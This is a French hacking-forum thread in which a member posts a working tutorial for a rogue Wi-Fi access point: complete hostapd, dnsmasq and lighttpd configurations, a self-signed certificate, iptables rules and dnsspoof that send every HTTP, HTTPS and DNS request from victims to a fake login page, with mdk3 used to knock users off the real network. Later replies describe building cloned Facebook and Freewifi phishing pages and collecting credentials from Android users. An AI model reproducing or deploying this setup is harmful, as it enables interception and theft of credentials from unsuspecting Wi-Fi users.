Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 12-06-2017 21:50:59

Sinaï00
Membre Radioactif
Inscription : 08-04-2015
Messages : 67

Un rogue ap en http https presque comme il faut ;-)

Salut ici, je vous partage mes différents fichiers de configurations pour mettre en place une rogue en http et https plutôt fonctionnel mais pas encore parfait. Pour ça, j'explore d'autres pistes...

Peso, je travaille avec trois cartes wifi
-awus051 nh v.2 -----> carte qui me sert à mettre en place le réseau, compatible avec hostapd
-carte wifi interne de mon pc -----> carte connecté à internet
-awus 036h -----> carte qui sert à deauth le réseau avec mdk3

Je me connecte à internet grâce mon téléphone en 4g. Je pourrai le brancher avec le câble, dans ce cas-là pour ma configuration, j'aurai usb0 à la place de la carte interne de mon pc (wlan0). ça peut aussi être eth0 si connecté avec le câble ethernet !

Dans ce sujet, je parlerai de la mise en place du faux réseau. Pour mdk3, je pense qu'il y a largement ce qu'il faut sur le forum.


Pour ce faire il nous faut installer les outils suivants :

-dnsmasq   -----> apt-get install dnsmasq
-lighttp   -----> apt-get install lighttpd
-hostapd   -----> apt-get install hostapd
-openssll  -----> at-get install openssl

Il nous faut aussi créer un dossier nommé "wifi_fichier" sur le bureau


Faire une copie du fichier de configuration de dnsmasq dans ect/dnsmasq/dnsmasq.conf puis le remplacer par :

interface=$interfaceRogue      #à remplacer bien entendu par la carte du rogue. wlan1 pour moi
dhcp-range=10.0.0.10,10.0.0.250,12h
dhcp-option=3,10.0.0.1
dhcp-option=6,10.0.0.1
server=192.168.1.14   # à remplacer par l'adresse ip de votre interface connecté à internet

Faire une copie du fichier de configuration de hostapd dans ect/hostapd/hostapd.conf puis le remplacer par :

interface=$interfaceRogue   #à remplacer bien entendu par la carte du rogue. wlan1 pour moi
driver=nl80211
ssid=$ssid  #à remplacer par le nom du réseau que vous souhaitez créer
hw_mode=g
channel=$canalRogue  #à remplacer par le cannal du réseau que vous souhaitez créer
macaddr_acl=0
auth_algs=1

Faire une copie du fichier de configuration de lighttpd dans /etc/lighttd/lighttpd.conf puis le remplacer par :

server.modules = (
	"mod_access",
	"mod_alias",
	"mod_compress",
 	"mod_redirect",
 	"mod_accesslog",
  	"mod_fastcgi",
	"mod_rewrite",
)

server.document-root        = "/var/www/html"
server.upload-dirs          = ( "/var/cache/lighttpd/uploads" )
server.errorlog             = "/var/log/lighttpd/error.log"
server.pid-file             = "/var/run/lighttpd.pid"
server.username             = "www-data"
server.groupname            = "www-data"
server.port                 = 80


index-file.names            = ( "index.php", "index.html", "index.lighttpd.html" )
url.access-deny             = ( "~", ".inc" )
static-file.exclude-extensions = ( ".php", ".pl", ".fcgi" )

compress.cache-dir          = "/var/cache/lighttpd/compress/"
compress.filetype           = ( "application/javascript", "text/css", "text/html", "text/plain" )

# default listening port for IPv6 falls back to the IPv4 port
include_shell "/usr/share/lighttpd/use-ipv6.pl " + server.port
include_shell "/usr/share/lighttpd/create-mime.assign.pl"
include_shell "/usr/share/lighttpd/include-conf-enabled.pl"

server.error-handler-404 = "/"

$SERVER["socket"] == ":443" {
  url.redirect = ( "^/(.*)" => "http://www.mabox.com")
  ssl.engine = "enable"
  ssl.pemfile = "/root/Bureau/wifi_fichier/server.pem" }


  $HTTP["host"] =~ "^www.(.*)$" {
  	url.redirect = ( "^/(.*)" => "http://%1/$1" )
  	ssl.engine                  = "enable"
  	ssl.pemfile                 = "/root/Bureau/wifi_fichier/server.pem"}
}

Créer un fichier de configuration dnsspoof /root/dns.txt avec :

10.0.0.1 *.*

OK pour les fichier de conf on est pas mal. Maintenant vous allez déposer votre page dans var/www/html

Nous allons créer le certificat pour notre page, ouvrir un terminal et envoyer la commande suivante :

openssl req -subj '/CN=SEGURO/O=SEGURA/OU=SEGURA/C=US' -new -newkey rsa:2048 -days 365 -nodes -x509 -keyout /root/Bureau/wifi_fichier/server.pem -out /root/Bureau/wifi_fichier/server.pem

On peut maintenant lancer le réseau avec les commandes suivantes :


service dnsmasq start
service lighttpd restart

ifconfig $interfaceRogue up
ifconfig $interfaceRogue 10.0.0.1/24

hostapd /etc/hostapd/hostapd.conf
iptables -t nat -F
iptables -F
iptables -t nat -A POSTROUTING -o $interfaceWeb -j MASQUERADE
iptables -A FORWARD -i $interfaceWeb -o $interfaceRogue -m state --state RELATED,ESTABLISHED -j ACCEPT
iptables -A FORWARD -i $interfaceRogue -o $interfaceWeb -j ACCEPT
echo '1' > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 10.0.0.1:80
iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to-destination 10.0.0.1
iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT --to-destination 10.0.0.1:443
iptables -A INPUT -p tcp --sport 443 -j ACCEPT
iptables -A OUTPUT -p tcp --dport 443 -j ACCEPT

dnsspoof -i $interfaceRogue -f /root/dns.txt

Pour le dnsspoof, je n'ai pas de différence avec ou sans. Il est tout de même intéressant, car il affiche dans un terminal l'ensemble des requêtes de votre cible.

Pensez à bien remplacer les différentes interfaces par les vôtres :-)
Et voilà plus qu'à vous connecter au réseau et regarder le résultat
Si vous êtes bien connecté à internet grâce à une de vos cartes, la majorité du temps le réseau n’apparaîtra pas en connectivité limitée.

Sous Windows 7 pour chrome et Firefox dans le cas de requête https, j'ai systématiquement une redirection vers ma page, à travers une invitation à se connecter au réseau wifi proposé par le navigateur.
Sous w10 j'ai dans la majorité des cas une page pop-up qui s'ouvre avec la page de connexion hébergé sur le serveur lighttpd var/www/html (Comme apache quoi ! )
Sous Windows 10 sur Chrome dans le cas d'une requête https, j'ai une erreur de certificat
Sous Windows 10 sous Firefox dans le cas d'une requête https, j'ai une redirection systématique vers la page hébergé par le serveur (normal, la détection automatique de portail captif fait partie des dernières mises à jour).

Je n'ai pas fait de test sur Windows 8

Je trouve que hostapd est plus efficace au niveau de la rapidité que airbase-ng
Merci à koala sans son script j'aurai sans doute passé plus de temps à configurer hostapd
J'utilise lighttpd au lieu d'Apache because j'en avais marre d'essayer de configurer apache en https roll
Je parlai à un moment de proposer un script. Je pense que ce n'est pas la meilleure idée que j'ai eue.
Il y a tout ici, suffit de bien copier les fichiers de conf des différents outils et de les remplir avec les fichiers de conf ci-dessus.

Si vous voulez vous faire un script perso pour automatiser tout ça, si vous voulez, j'ai récupéré différentes fonctions qui permettent notamment d'automatiser le scan, la sélection de réseaux, la sélection d'interfaces ...
Bref, ça va vite et c'est pratique.

Source :

-internet
-hostbase
-linset
-fluxion
-moi (un peu aussi)

Bonne continuation. Si vous avez des questions, je suis un peu disponible en ce moment.
Je n'ai pas testé tout ça sur une version de kali-linux toute neuve. Donc j’espère que ça fonctionnera avec vos paramètres persos smile

Petite précision j'utilise wicd et pas network-manager

Dernière modification par Sinaï00 (13-06-2017 09:03:17)

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 12-06-2017 23:17:21

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 493

Re : Un rogue ap en http https presque comme il faut ;-)

Merci pour se beau tuto bien complet. smile

Hors Ligne

#3 13-06-2017 07:50:11

MiscL
Membre V.I.P.
Lieu : BE
Inscription : 10-06-2016
Messages : 242

Re : Un rogue ap en http https presque comme il faut ;-)

Sehr gutt!

Thx pour les infos, vais tester ça ce weekend!


--|--   MiscL   --|--
- Accept No Limit -

Hors Ligne

#4 13-06-2017 09:00:10

Sinaï00
Membre Radioactif
Inscription : 08-04-2015
Messages : 67

Re : Un rogue ap en http https presque comme il faut ;-)

Un plaisir,  depuis le temps que je prend des infos sur le forum, il était temps que je donne un peu en retour ;-)

Hors Ligne

#5 20-06-2017 14:26:27

[email protected]
Banni(e)
Lieu : Avignon
Inscription : 03-06-2017
Messages : 21

Re : Un rogue ap en http https presque comme il faut ;-)

supprimer

Dernière modification par [email protected] (17-07-2017 12:11:54)

Hors Ligne

#6 22-06-2017 22:13:22

Sinaï00
Membre Radioactif
Inscription : 08-04-2015
Messages : 67

Re : Un rogue ap en http https presque comme il faut ;-)

écoute je fais rapidement des testes sur un live usb kali 2017.1 et je te fais un retour des choses à améliorer.
J'ai pas trop le temps en ce moment, c'est un peu speed la vie wink !!!

Hors Ligne

#7 23-06-2017 12:37:49

[email protected]
Banni(e)
Lieu : Avignon
Inscription : 03-06-2017
Messages : 21

Re : Un rogue ap en http https presque comme il faut ;-)

aaaaa

Dernière modification par [email protected] (17-07-2017 12:12:58)

Hors Ligne

#8 23-06-2017 20:43:04

Sinaï00
Membre Radioactif
Inscription : 08-04-2015
Messages : 67

Re : Un rogue ap en http https presque comme il faut ;-)

Hello, un plaisir wink

première éléments de réponse pour hostapd, pour moi ça fonctionne très bien avec wicd mais pas avec network-manager...
hostapd est quand même beaucoup plus rapide pour gérer les connexions. Les différentes requête s'exécute également plus rapidement qu'avec aircrack-ng.
Fin bref plus léger plus rapide. Je te conseil d'essayer de le faire fonctionner.

apt-get  install wicd
apt-get autoremove network manager

Surtout ne supprime pas les deux tu seras emmerder, garde en toujours un  !
hostapd marche très bien avec la conf ci dessus.

Pour lighttpd je ne sais pas encore, c'est vrai qu'il ne fonctionne pas en live avec cette configuration.
Pourtant il marche nickel sur mon kali.
Bon j'ai oublié de préciser mais il faut également installer php5-cgi, mais même avec ça, sa reste bancale ^^

Bon je vais rapidement trouver le problème sur le live. je te tiens au courant !

Hors Ligne

#9 23-06-2017 20:52:36

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 580

Re : Un rogue ap en http https presque comme il faut ;-)

Ton post va en aider plus d'un et c'est ka qu'on voit la puissance de Linux c'est à dire qu'on a plusieurs manière ou tool pour arriver à nos fin smile


Juste un truc, hostapd marche avec network manager il fait juste éteindre tout ses services.Autrement si il supprime wicd et network manager il peut toujours up son interface éthernet.

Hors Ligne

#10 25-06-2017 20:57:55

[email protected]
Banni(e)
Lieu : Avignon
Inscription : 03-06-2017
Messages : 21

Re : Un rogue ap en http https presque comme il faut ;-)

Bonsoir Messieurs Koala et Sinai00
C'est un plaisir de vous lire.

MERCI à vous.
Si vous passez du coté d'Avignon passez me voir qu'on se fasse une bouffe.
Je ne sais pas qui donne les etoiles sur ce site, ni comment on fait,mais pour Sinai00, moi je vote pour 2 en OR et 2 Bleu.
Pour koala,peut etre une septieme etoile si c'est possible,mais il n'en à plus besoin,tous le monde le connait et il n'a plus rien à prouver
Je retourne travaillé sur ce(s) script(s), en vous souhaitant, le meilleur. Papy

Dernière modification par [email protected] (17-07-2017 12:14:11)

Hors Ligne

#11 27-06-2017 08:21:49

disquette
Membre Indétronable
Inscription : 26-12-2015
Messages : 179

Re : Un rogue ap en http https presque comme il faut ;-)

@ Sinaï00 & @ [email protected] , merci votre script smile


Kali Rolling 4.12.0-kali2-amd64 #1 SMP Debian 4.12.13-1kali2 (2017-10-03) x86_64 GNU/Linux
Alfa AWUS036ACH / Alfa AWUS036H / Alfa AWUS036NH
baia5Ec2D4JPswHFDhl9nA.png

Hors Ligne

#12 27-06-2017 08:47:00

[email protected]
Banni(e)
Lieu : Avignon
Inscription : 03-06-2017
Messages : 21

Re : Un rogue ap en http https presque comme il faut ;-)

Bonjour Mr disquette.
Tous le mérite est à attribuer à Mr Sinai00 mais pas à moi,merci quand meme et si vouliez bien participé,vous etes le bienvenu car ,MO,I je pédale dans le vide ,mais je m'approche contrairement à Mr sinai00 qui lui à presque (ou déjà) fini.
Amitiés. Papy

Hors Ligne

#13 27-06-2017 18:39:01

Sinaï00
Membre Radioactif
Inscription : 08-04-2015
Messages : 67

Re : Un rogue ap en http https presque comme il faut ;-)

Salut [email protected] merci pour les étoiles wink
Pour lighttpd "normalement" avec la config que j'ai mis tout devrai fonctionner nickel.
Tu trouveras dans le dossier suivant la liste des erreurs en un peu plus détaillé : /var/log/lighttpd/error.log
tu dois installer php-cgi mais aussi activer le module fastcgi-php pour que cette config de lighttpd fonctionne.

https://doc.ubuntu-fr.org/lighttpd

Pour l'installer si tu es vraiment sur kali 2.0 la commande suivante devrai suffire :

apt-get install php5-cgi

Si tu es sur kali 2016.1 ou version plus récente

- Rajoute simplement les dépôts de kali sana dans ton fichier sources.list
- Update kali-linux
- Installe php5-cgi
- Remet tes dépôts comme à l'origine et n'oublie pas de remettre à jour.

https://docs.kali.org/general-use/kali- … positories

Bon aprés j'ai pas eu le temps de faire de teste autre que sur un live sans persistance, ça limite pas mal quand même. Dés que je trouve un moment je ferai un retour et je mettrai à jour le premier poste.

Tu dis que ça fonctionne sur internet explorer. C'est en faisant fonctionner lighttpd ou apache ?
En https également ?

Sinon je parlais avec un développeur pas plus tard que tout à l'heure qui me disait comprendre complétement ma fuite d'apache. Apache qui est bien pratiquer est généralisé, mais pas forcément la solution la plus adaptée à toutes les solutions. En même temps, j'ai passé tellement de temps à galérer pour essayer de le configurer.
Et il me disait qu'il était lui passé sur nginx, qu'il considérai comme le meilleur serveur web du marché. Rien que ça wink
Bref, ça peut être une Tiers solution à étudier ^^

Pour ce qui est de wicd, tu vas voir, c'est d'une facilité à utiliser, perso, j'ai un peu de mal à m'en passer maintenant big_smile
Moins pratique pour les connexions VPN, mais avec un petit script bash le problème est vite réglé.
En tout cas si je passe du côté d’Avignon, je me ferai un plaisir de venir discuter de vive voix wink le souci, c'est que je suis un peu à l'autre bout de la France wink

Hors Ligne

#14 28-06-2017 17:05:14

[email protected]
Banni(e)
Lieu : Avignon
Inscription : 03-06-2017
Messages : 21

Re : Un rogue ap en http https presque comme il faut ;-)

supprimer

Dernière modification par [email protected] (17-07-2017 12:14:51)

Hors Ligne

#15 07-07-2017 21:08:30

Sinaï00
Membre Radioactif
Inscription : 08-04-2015
Messages : 67

Re : Un rogue ap en http https presque comme il faut ;-)

Salut,
Oui c'est à ça que vas servir php5.
Je suis content que ça fonctionne à peu prés pour toi ;-)
Si jamais tu fais des progrès ou que tu trouve des choses intéressante avec nginx ou encore freeraduis n’hésite pas à me contacter.
Pour ma part j’essaye de bosser à fond sur python en ce moment pour monter un petit programme avec interface graphique qui permettrai de mettre en place le rogue-ap.

Voilà voilà, à bientôt !

Hors Ligne

#16 13-07-2017 13:54:14

[email protected]
Banni(e)
Lieu : Avignon
Inscription : 03-06-2017
Messages : 21

Re : Un rogue ap en http https presque comme il faut ;-)

Bonjour,mon ami. Félicitation pour votre nouveau grade de "MENBRE RADIOACTIF". J'ai été malade et j'ai trés peu avancé.
Mais je viens de comprendre l'importance et la portée de vos derniers posts.En effet,je demandais de l'aide,comme vous l'avez fait
en me donnant le lien https://doc.ubuntu-fr.org/lighttpd que j'ai trés vite compris.Mais je ne voulais pas la solution comme vous
l'avez proposez en me donnant l'astuce kali sana et surtout la conf de lighhtpd.Mais,je dois reconnaitre,maintenant que je comprends,
que je n'aurai JAMAIS réussi,car je comfirme que mon petit script fonctionne à 100% avec des pc mais pas avec des androids ou windows-
phone.Je crois que ça viens de mon dhcp et des regles iptables,mais je vais éssayer de régler çela rapidement (j'espère) et là, ça sera une arme
redoutable.Quand je relis vos premiers posts dans lesquels vous ne compreniez pas *.* ,et,aujourd'hui,c'est vous qui donnez LA solution
et en plus vous passez au python.TOUS ça en quelques mois seulement....?????? INCROYABLE.
Vous n'etes peut etre pas le plus grand sur ce site,mais pour moi vous étes MON "prof",et j'ai beaucoup de respect pour votre travail et
votre participation.AINSI,j'ai décidé de publier un (presque) nouveau script (celui qui marche pas avec les androids,pour le moment),
rendant hommage: à votre travail,à crack-wifi.com et à koala que je n'ose déranger (j'ai trop honte de pas réussir avec powner launcher).
Mais avant de le publier,je ferai les modifs necessaire,si des personnes ne veulent pas que leur nom soit cité sur un script aussi "merdique",mais qui marche,sauf avec
les androids,je le rappel.C'est pour cette raison que je voudrai le publier pour partager les (Vos) connaissances et avoir encore un peu d aide.
J'ai trouvé dans "Aerial-master" qu'il existe plusieur façon de créér un faux certificat de validité,je vais éssayer de voir un peu de
ce coté et revoir mes réglage dhcp et iptables.
Dans l'attente de vous lire,recevez,mon ami,toute ma sympathie,toute ma gratitude et mon plus profond respect.(ça fais un peu leche cul quand meme).:lol:
Papy

Hors Ligne

#17 17-07-2017 11:43:02

[email protected]
Banni(e)
Lieu : Avignon
Inscription : 03-06-2017
Messages : 21

Re : Un rogue ap en http https presque comme il faut ;-)

Bonjours,
en m'inscrivant sur ce site,je cherchais des amis (car je suis seul) et des passionnés de l'outil KALI LINUX .Je ne suis qu'un "NOOB" mais J'ai attendu plus d'un an (en vous lisant) avant de m'inscrire.J'ai voulu participé en publiant un petit script avec mon adresse mail pour partager (tres modestement) et pour avoir de l'aide.Comme l'identification sur ce site n'est pas sécurisé,quelq'un à profité de ces informations pour me bloquer ma boite mail et mon drive dans lequel j'avais mis mes deux années de recherche  ainsi que tous mes scripts.Aujourdh'hui je n'ai plus rien,et je n'ai plus la force de recommencer à zéro.BRAVO pour l'exploit (je reste sport) mais vous etes peu nombreux capable d'un tel acte,alors celui qui à réussi à me bloquer peut-il me rendre mon acces s'il vous plait,sans quoi, je crains de devoir arreté là et rejoindre le club des "VIEILLARDS QUI JOUE AUX BOULES" ( tu pense bien que je prefere avoir un accident en moto plutot que de jouer aux BOUBOULES).Merci de m'avoir lu.
Papy

Hors Ligne

#18 17-07-2017 11:55:05

[email protected]
Banni(e)
Lieu : Avignon
Inscription : 03-06-2017
Messages : 21

Re : Un rogue ap en http https presque comme il faut ;-)

A Sinaï00,
Bonjour mon ami,on m'as piraté ma boite mail et je crains de devoir arreter,mais avant, je tenais à vous remercier pour toute l'aide,la patience et la gentillesse dont vous avez fait preuve à mon égard (tout çà pour rien...).Je vous souhaite le meilleur,ainsi qu'a vos proches.Vous etiez mon premier "ami virtuel".SINCERES AMITIES.
Papy.

Hors Ligne

#19 17-07-2017 22:04:06

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 421

Re : Un rogue ap en http https presque comme il faut ;-)

Hello,

Pour info, l'identification sur le forum et sur ta boite gmail sont deux choses totalement différentes et indépendantes. Tu ne t'es pas fait hacker, ou bloquer ta boite mail par rapport au forum, mais probablement par rapport à des informations que tu as pu laisser trainer ici ou ailleurs. D'ailleurs, si ta boite est bloquée, cela ne signifie pas forcément qu'elle a été hackée. Gmail a des dispositifs de protection plutot costauds, et un système de récupération en cas de problème, il te suffit de les contacter pour plus d'infos.

Hors Ligne

#20 18-07-2017 13:15:32

[email protected]
Banni(e)
Lieu : Avignon
Inscription : 03-06-2017
Messages : 21

Re : Un rogue ap en http https presque comme il faut ;-)

Bonjours monsieur,
m'en fout j'ai créé une nouvelle boite mail,mais ça m'as beaucoup fatigué cette histoire.Plus la force de recommencer du début.je faisait ça pour passé le temps.je vais passé à autre chose. peut etre apprendre à faire des fakes pages(facebook,freewifi...)si cela ne s'averre pas trop difficile.Où pourrai-je trouver des infos pour cela ou  des pages déjà (presque)toutes faites pour comprendre comment çela fonctionne.Je suis déçu pour l'attaque que je subit,mais je dois reconnaitre que j'aimerai bien savoir faire pareil.
Si vous avez des idées sur ce que je pourrai faire d'autre avec kali (pas trop difficile).merci.
Papy.

Hors Ligne

#21 18-07-2017 20:01:11

JeanCharles
Membre V.I.P.
Lieu : Sainte-Anne
Inscription : 13-07-2012
Messages : 219

Re : Un rogue ap en http https presque comme il faut ;-)

[email protected] a écrit :

peut etre apprendre à faire des fakes pages(facebook,freewifi...)si cela ne s'averre pas trop difficile.Où pourrai-je trouver des infos pour cela ou  des pages déjà (presque)toutes faites pour comprendre comment çela fonctionne.

Salut, déja en creusant sur le forum...qui est assez bien fourni sur le sujet, j'en connais pas beaucoup d'autre aussi bien renseigné sur les rogues AP...
ou sinon regardes les bases du développement web, front-end( html, css, javascript, etc..) et coté serveur aussi: php & mysql ,c'est sympa pour commencer...


« γνωθι σεαυτον »

Hors Ligne

#22 19-07-2017 14:29:24

[email protected]
Banni(e)
Lieu : Avignon
Inscription : 03-06-2017
Messages : 21

Re : Un rogue ap en http https presque comme il faut ;-)

Bonjour,monsieur. MERCI pour votre aide.J ai consulté les liens que vous m'avez donné,mais c'était trop long et compliqué,alors j'ai comparé les fake pages dans HOSTBASE (programme de KOALA),celles que je faisais avec setoolkit et la page original. J'ai trouvé les différences et j'ai fais dans la nuit une fake page "freewifi" et une autre de "facebook" ,les deux en html.J'ai rassemblé mes souvenirs et,j'ai refais un nouveau petit script(celui qui est dans mon drive dont je n'ai plus l'accés).Il est plus lent,mais maintenant,j'arrive meme à faire fonctionné mon portail captif et récupérer des données sur les androids.MERCI à vous ainsi qu'à Messieurs KOALA et mon ami SINAI00.Je ne publierai plus jamais de script tous fais,mais tous les MEMBRES de ce site peuvent compté sur moi pour aider et transmettre le peu que je sais sur les portails captif et le clonage de fake pages en html sans leur faire perdre leur temps.J'ai réussi ce que je voulais,je vais maintenant un peu me reposé et m'occupé des tomates du jardin.Je vous souhaite à tous de passé un bel été.
Papy.

Hors Ligne

#23 19-07-2017 19:54:54

_john_doe
Membre Actif
Inscription : 11-07-2017
Messages : 39

Re : Un rogue ap en http https presque comme il faut ;-)

Es tu sur que quelqu’un est pris possession de ta boite mai?

Comme expliqué par Mickey, Gmail (ou autre) à mis des sécurités en place des qu'il soupçonne une tentative de prise de contrôle etrange (localisation bizarre, nouvel OS, nouvel IP....).

Ton compte est peut être simplement BLOQUE par ce fournisseur suite a des tentatives de connections infructueuses et non pas hacké.

As tu suivi la procédure de récupération de compte  ?

Si c'est de 2 ans de boulots dont on parle, ne laisse pas tomber.

Hors Ligne

#24 19-07-2017 22:44:50

[email protected]
Banni(e)
Lieu : Avignon
Inscription : 03-06-2017
Messages : 21

Re : Un rogue ap en http https presque comme il faut ;-)

Bonsoir Mr _john_doe
Je confirme que j'ai été et suis encore victime de quelque chose. j'ai pu récupérer ma boite mail,mais je ne peus plus avoir acces aux dossier dans mon drive.Ils en reste plus que trois sur une trentaine et quand j'essaye de les ouvrir,je suis redirigé vers une page vierge sans aucun code source(ça sent mauvais cette merde).Comme je l'ai dit,je ne suis qu'un NOOB et je comprend rien à cette "attaque".je suis actuellement connecté à ma boite mail et j'ai peur de me déconnecté pour ne pas reperdre l'accés,mais j'ai peur aussi de resté connecté.Putain moi aussi j'ai réussi à récupérer des identifiants,mais je ne les ai jamais utilisés car seul l'EXPLOIT compte.Faire chié des pauvres.....lamentable.Merci Monsieur  _john_doe pour votre soutient.
Papy
message à la personne où AUX personnes responsable de ce massacre:METTRE UN TEL DON AU SERVICE D'UNE BIEN MAUVAISE CAUSE EST TRES TRISTE POUR VOUS. SERVEZ VOUS EN POUR CHANGER LE MONDE EN QUELQUE CHOSE DE MEILLEUR.

Hors Ligne

#25 20-07-2017 10:19:33

[email protected]
Banni(e)
Lieu : Avignon
Inscription : 03-06-2017
Messages : 21

Re : Un rogue ap en http https presque comme il faut ;-)

bonjour,et merci à tous ceux qui me soutienne.Voici le résultat de mes "investigations":
Oui,j'ai éssayé plusieurs fois de récupére ma boite,mais plus je rentrais d'infos,plus on m'en demandais.j'ai donc arréter de divulgué des infos sur ma vie privée.Comme je disais hier,j'ai de nouveau le control de ma boite(enfin,j'éspere) mais les pages de mon drive ont disparues.Celles qui reste me renvoie sur rien avec une url qui fait 5 lignes.Maintenant,accrochez vous.Toutes les manips que j'ai effectué pour récupérer ma boite mail ont été faites avec mon pc privé équipé de windaube7, et puis, cette nuit, je me suis connecté à ma boite avec "SON ALTESSE ROYALE KALI 2017",J'ai accédé à mon drive,puis j'ai ouvert un des trois dossier qui sont resté, et, SURPRISE:
J'ai accés au contenu,et l'url est correcte(moins d'une ligne).J'ai donc récupéré le contenu des ces trois seul dossier.Tout le reste est perdu.J'ai pensé que le problème venait peut etre de mon pc privée,alors je l'ai réinstallé (toujours windaube7), mis à jour, et je me connecte à mon drive.Le résultat est identique:impossible d'affiché le contenu des pages,avec redirection vers la page vierge et son url de 5 lignes.Je n'arrive pas avec windaube,mais avec kali,ça marche.Bizarbizare.
Amitiés à toutes et tous,
Papy.

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
Hostbase V0.9 rogue AP script par koala  [ 1 2 3 6 ]
133 7419 27-09-2017 19:00:56 par koala
HTTPS pour le forum par pueblo
5 361 16-08-2017 12:55:39 par Fab955
Rogue ap fakepage par Sinaï00
22 1919 17-07-2017 12:35:24 par [email protected]
27 3666 28-01-2017 20:51:15 par flatounet
122 6003 25-01-2017 14:35:55 par disquette

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.034 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]